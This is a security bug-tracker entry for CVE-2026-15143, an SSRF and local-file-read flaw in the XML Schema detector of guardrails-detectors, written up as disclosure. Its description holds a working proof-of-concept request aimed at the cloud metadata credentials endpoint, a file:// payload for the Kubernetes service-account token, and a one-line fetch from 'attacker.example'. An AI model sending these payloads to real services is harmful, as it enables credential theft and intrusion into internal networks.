Bug 2498165 (CVE-2026-15143)

Summary: CVE-2026-15143 guardrails-detectors: guardrails-detectors: SSRF and local file read via user-supplied XML Schema (xml-with-schema:)
Product: [Other] Security Response Reporter: OSIDB Bzimport <bzimport>
Component: vulnerabilityAssignee: Product Security <prodsec-ir-bot>
Status: NEW --- QA Contact:
Severity: high Docs Contact:
Priority: high    
Version: unspecifiedCC: security-response-team
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: ---
Doc Text:
A flaw was found in the file_type content detector of guardrails-detectors. This vulnerability allows a remote attacker to supply an arbitrary XML Schema Definition (XSD) string, which is processed without proper restrictions. This can lead to server-side requests to arbitrary URLs or local file reads, potentially resulting in sensitive information disclosure, such as cloud provider credentials or access to internal network services.
Story Points: ---
Clone Of: Environment:
Last Closed: Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description OSIDB Bzimport 2026-07-08 17:13:53 UTC
The file_type content detector in guardrails-detectors accepts an arbitrary XML Schema Definition (XSD) string supplied directly in the request body and passes it unmodified to xmlschema.XMLSchema(), which by default resolves <xs:import>, <xs:include>, and <xs:redefine> schemaLocation references over any URL scheme (including http(s):// and file://).

Affected code: detectors/built_in/file_type_detectors.py, function is_valid_xml_schema():

    xs = xmlschema.XMLSchema(schema)

schema is taken directly from the request's detector_params.file_type value for the "xml-with-schema:<XSD>" detector type, with no sanitization or scheme restriction. The xmlschema library is pinned to 4.1.0 in detectors/pyproject.toml; that version only restricts external references when the caller explicitly passes allow='sandbox' or allow='local', which this code does not do.

An attacker with network access to the detector service can send a request such as:

{"contents": ["<a/>"],
 "detector_params": {"file_type": [
   "xml-with-schema:<xs:schema xmlns:xs='http://www.w3.org/2001/XMLSchema'><xs:include schemaLocation='http://169.254.169.254/latest/meta-data/iam/security-credentials/'/></xs:schema>"
 ]}}

which causes the detector pod to make a blind, server-side HTTP request to the supplied URL before validation completes. This can be pointed at cloud provider instance-metadata endpoints (credential theft), the in-cluster Kubernetes API server, internal services such as MinIO, or any other endpoint reachable from the pod's network namespace. Using a file:// scheme (e.g. schemaLocation='file:///var/run/secrets/kubernetes.io/serviceaccount/token') causes the library to attempt to read that local file instead. A bare string such as "xml-with-schema:http://attacker.example/x.xsd" (with no xs:include wrapper at all) is sufficient by itself, since xmlschema.XMLSchema() treats a string that looks like a URL as a schema location to fetch.

The parsing/construction step is wrapped in a generic except Exception, so the HTTP response or file contents are not returned to the caller (exploitation is blind/error-based), but the outbound request or local file open is still made server-side regardless of whether the exception is later raised.

Verified directly against the current upstream source (trustyai-explainability/guardrails-detectors, main branch, commit 747a4d3 at the time of this analysis) that the vulnerable code and the xmlschema==4.1.0 pin are both still present and unchanged.

Reported via Red Hat Product Security's internal "Project Glasswing" (Mythos) security audit of RHOAI components. Original audit reference: rhoai-3.4 @ 29f7a14d008e667d6f216ba5921e95daf6c9a269 (RHOAIENG-71919).